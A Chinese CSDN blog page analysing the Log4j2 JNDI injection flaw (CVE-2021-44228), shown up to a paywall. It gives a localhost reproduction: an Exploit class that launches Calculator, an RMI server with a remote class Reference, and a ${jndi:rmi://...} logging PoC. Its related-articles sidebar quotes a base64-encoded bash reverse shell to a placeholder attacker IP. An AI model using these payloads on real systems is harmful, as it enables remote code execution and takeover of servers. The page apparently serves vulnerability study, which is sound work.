Log4j2的JNDI注入漏洞原理分析与思考,java面试线程池

最新推荐文章于 2024-05-30 17:33:13 发布
最新推荐文章于 2024-05-30 17:33:13 发布
阅读量1k 收藏 20
点赞数 25
分类专栏: 2024年程序员学习 文章标签: log4j java 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uftdv17136/article/details/137153260
版权

本篇文章主要分析Log4j2的JNDI注入产生原因,并不会对JNDI注入自身太过关注,网上也有大量分析的文章可供参考,这里就不再详述了。

二、 漏洞复现

=======

以下复现使用Log4j2-2.14.1版本,maven的引用依赖参考如下:

org.apache.logging.log4j

log4j-core

2.14.1

org.apache.logging.log4j

log4j-api

2.14.1

  1. 编写漏洞利用代码Exploit并编译生成Exploit.class。代码如下:

public class Exploit {

static {

String cmd = “/Applications/Calculator.app/Contents/MacOS/Calculator”;

final Process process;

try {

process = Runtime.getRuntime().exec(cmd);

process.waitFor();

} catch (Exception e) {

e.printStackTrace();

}

}

}

  1. 本地执行 python3 -m http.server 8081 ,启动web服务器,监听在8081端口。将上一步编译生成的Exploit.class文件放到web服务的根目录(根目录即为执行 python3 -m http.server 8081 命令的工作目录)。

  2. 编写RMI服务端代码RMIServer,并编译运行。代码如下:

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;

import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;

public class RMIServer {

public static void main(String args[]) throws Exception {

Registry registry = LocateRegistry.createRegistry(1099);

Reference exploit = new Reference(“Exploit”, “Exploit”, “http://127.0.0.1:8081/”);

ReferenceWrapper exploitWrapper = new ReferenceWrapper(exploit);

registry.bind(“exp”, exploitWrapper);

}

}

  1. 编写漏洞poc代码,并编译运行。代码和运行结果如下:

import org.apache.logging.log4j.LogManager;

import org.apache.logging.log4j.Logger;

public class Log4j2RCEPoc {

public static final Logger LOGGER = LogManager.getLogger(Log4j2RCEPoc.class);

public static void main(String[] args) {

LOGGER.error(“${jndi:rmi://127.0.0.1:1099/exp}”);

}

}

最低0.47元/天 解锁文章
uftdv17136
关注
  • 25
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Log4j2JNDI注入漏洞原理分析思考
uuuyy_的博客
12-23 2498
前言 最近Log4j2JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
log4j-jndi注入(CVE-2021-44228)
weixin_55885866的博客
01-13 442
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTA4LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "攻击机器ip"bash -i >& /dev/tcp/攻击机器ip/6666 0>&1。${jndi:ldap://dnslog子域名}
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4018
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Java面试不通过?这篇文章你看了吗?
程序羊的博客
08-06 4万+
Java面试题千千万,个人觉得没有最好的答案,只有最适合的答案;本文的宗旨是为读者朋友们整理一份详细而又权威的面试清单。 此文是前段时间本人根据部分文章汇总压在草稿箱(由于时间关系,忘了加上对应的原创链接,如有侵权,请联系本人删除,本人单纯秉着知识乐于分享的精神),今天发现在草稿箱,特发出来给大家,仅供参考。 注:本人才疏学浅,知识还在积累中,不能保证每个回答都满足各种等级的高手们,(由于一些技术的升级,部分答案不能保证实时同步准确,还请大家在阅读的时候多多留意)若发现有问题的话,请评论指出。.......
JAVA面试题大全(200+道题目)
qq_38078190的博客
05-04 3万+
面试题 一、Java 基础 1.JDK 和 JRE 有什么区别? 2.== 和 equals 的区别是什么? 3.两个对象的 hashCode()相同,则 equals()也一定为 true,对吗? 4.final在 java 中有什么作用? 5.java中的 Math.round(-1.5) 等于多少? 6.String 属于基础的数据类型吗? 7.java中操作字符串都有...
2021 Java面试真题集锦
热门推荐
GL1765852966的博客
12-26 8万+
目录 … 1 大厂面试的基本流程 17 字节跳动 17 阿里 17 腾讯 18 网易游戏 18 面试前需要准备: 18 面试中可以借鉴的套路 19 用简历争取到更多的面试机会 19 自我介绍时,立即全面抛出技术栈和亮点 20 先介绍项目背景,打消面试官疑问 21 通过说项目管理工具,说明你不仅会写代码 22 用 SPRING BOOT 项目举例,说明你的技术基本面 23 用实例说明你在内存调优方面的经验 24 展示你在数据库调优方面的经验 25 总结前文说辞 26 准备项目说辞时,更可以准备后继面试官的问
Java面试宝典
qq_54753411的博客
11-19 538
还在担心面试找不到工作吗! 2021年最新面试宝典,还不赶紧背下来!!!
Java面试
zpeien
12-23 560
一、Java 基础 1. JDK 和 JRE 有什么区别? JDK:Java Development Kit 的简称,java 开发工具包,提供了 java 的开发环境和运行环境。 JRE:Java Runtime Environment 的简称,java 运行环境,为 java 的运行提供了所需环境。 具体来说 JDK 其实包含了 JRE,同时还包含了编译 java 源码的编译器 javac,还包含了很多 java 程序调试和分析的工具。简单来说:如果你需要运行 java 程序,只需安装 JRE 就可
637道Java面试题(含答案)
跑码场
03-01 1474
637道Java面试题(含答案),涵盖Java基础、Java并发、Spring、Spring Boot等多方面面试要点
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
技术专栏 _ 深入理解JNDI注入Java反序列化漏洞利用.pdf
09-18
技术专栏 _ 深入理解JNDI注入Java反序列化漏洞利用 企业安全 工控安全 安全对抗 安全建设 企业安全
log4j-2.15.0-rc2.zip
12-11
修复log4j关于JNDI注入漏洞注入的jar升级包,内附漏洞验证方式
log4j_2.1.5.zip
12-14
logj JNDI 补丁包
代码质量与可维护性提升
偏执的小男孩儿
05-28 869
代码质量与可维护性提升
golang web补充知识:单元测试
最新发布
loo_Charles_ool的博客
05-30 850
单元测试是软件开发过程中的一种质量保证方法,它通过对软件中的最小可测试单元进行检查和验证,确保每个单元都能按照预期工作,文章介绍单元测试在golang中的编写和应用方法
Spring——依赖项
qq_40419080的博客
05-29 686
依赖注入
log4j2漏洞原理及特征
05-28
漏洞的原因是log4j2中存在一种称为JNDI注入漏洞。攻击者可以通过构造特定的日志消息触发log4j2使用Java命名和目录接口(JNDI)来执行恶意的Java代码。这个漏洞的特点是攻击者可以通过构造一个包含恶意JNDI名称的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值